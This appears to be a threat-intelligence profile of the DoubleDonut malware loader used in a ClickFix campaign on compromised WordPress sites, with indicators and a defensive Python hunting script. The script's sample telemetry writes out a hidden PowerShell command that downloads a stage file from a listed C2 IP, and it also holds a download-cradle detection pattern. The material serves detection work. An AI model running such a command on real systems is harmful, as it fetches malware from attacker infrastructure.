DoubleDonut
DoubleDonut is a two-stage Donut-based malware loader observed by Rapid7 in a large ClickFix campaign that used compromised legitimate WordPress websites to infect visitors, primarily on Windows systems. In this activity, attackers injected malicious JavaScript into WordPress sites or served it through WordPress admin-ajax endpoints, presenting a fake Cloudflare verification/CAPTCHA page that instructed users to paste a command into the Windows Run dialog. The resulting infection chain used PowerShell stagers to download shellcode such as cptch.bin and cptchbuild.bin, execute it in memory, and inject later stages into processes including svchost.exe. Rapid7 assessed that the campaign used the open-source Donut loader twice in sequence, referring to this component as “DoubleDonut” or the “DoubleDonut Loader.”
The campaign was described as active in this form since December 2025, with some supporting infrastructure dating to July/August 2025, and Rapid7 identified more than 250 compromised websites across at least 12 countries. DoubleDonut was used to deliver infostealer payloads including Vidar, a previously unnamed .NET stealer Rapid7 called Impure Stealer, and a newer C++ stealer dubbed VodkaStealer. The delivered payloads were capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data, and other sensitive information from infected devices. High-confidence infrastructure and infection-chain indicators mentioned in the reporting include 91.92.240[.]219, 178.16.53[.]70, 94.154.35[.]115, and later 172.94.9[.]187, along with shellcode filenames cptch.bin and cptchbuild.bin. The initial WordPress compromise vector was not confirmed, though weak administrator credentials and unpatched themes or plugins were cited as likely possibilities.
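As an added example (not code from Rapid7's report or from this page), the following hunting script flags the chain described above in process-creation telemetry: a PowerShell download cradle parented by explorer.exe (the Run-dialog paste), the cptch.bin / cptchbuild.bin stage names and the listed infrastructure, and svchost.exe started by something other than services.exe. The sample events are constructed, and the download-cradle token list is a generic assumption rather than something taken from the reporting.

```python
import re
from dataclasses import dataclass

# Indicators quoted in the write-up above; defanging brackets removed so they match raw telemetry.
IOC_IPS = {"91.92.240.219", "178.16.53.70", "94.154.35.115", "172.94.9.187"}
IOC_FILES = {"cptch.bin", "cptchbuild.bin"}
# Generic PowerShell download-cradle tokens (assumption: not taken from the report).
CRADLE_RE = re.compile(r"(invoke-webrequest|\biwr\b|\birm\b|downloadstring|downloaddata|"
                       r"net\.webclient|invoke-expression|\biex\b)", re.I)

@dataclass
class ProcEvent:
    """Minimal process-creation record (e.g. the Sysmon Event ID 1 fields we need)."""
    parent: str
    image: str
    cmdline: str

def score_event(ev: ProcEvent) -> list[str]:
    """Return the DoubleDonut/ClickFix-related findings for one event (empty list if clean)."""
    findings = []
    image, parent, cl = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        # Run-dialog paste: explorer.exe parents a PowerShell download cradle.
        if parent.endswith("\\explorer.exe") and CRADLE_RE.search(cl):
            findings.append("powershell download cradle spawned by explorer.exe (Run dialog)")
        findings += [f"stage filename {f}" for f in IOC_FILES if f in cl]
    findings += [f"known C2 {ip}" for ip in IOC_IPS if ip in cl]
    # Legitimate svchost.exe is started by services.exe; any other parent is worth a look.
    if image.endswith("\\svchost.exe") and not parent.endswith("\\services.exe"):
        findings.append("svchost.exe with non-services.exe parent")
    return findings

def hunt(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> findings, for every event that matched at least one rule."""
    return {i: f for i, ev in enumerate(events) if (f := score_event(ev))}

# Constructed sample telemetry modelled on the chain described above (not real logs).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -w hidden -c \"iwr http://91.92.240.219/cptch.bin -OutFile $env:TEMP\\c.bin\""),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for idx, found in hunt(SAMPLE_EVENTS).items():
        print(idx, found)
```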
Techniques & procedures
3 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (1 technique)
Researchers say attackers compromise legitimate WordPress sites and inject malicious JavaScript designed to intercept visitors before they can access the site's content. Instead of silently redirecting users, the injected code presents a fake Cloudflare verification page...
Recent activity
3 sources tracked across advisories, community write-ups, and news.
A loader used in the ClickFix malware distribution operation involving compromised WordPress sites; it is listed among payloads used to facilitate theft of sensitive data.
Loader used in the ClickFix campaign delivered through compromised WordPress sites to facilitate payload delivery of credential- and data-stealing malware.
Campaign-specific two-step loader chain built around Donut: first Donut shellcode loads a small downloader that acquires SeDebugPrivilege, downloads a second Donut shellcode, injects it into a native svchost.exe, and executes the final infostealer payload.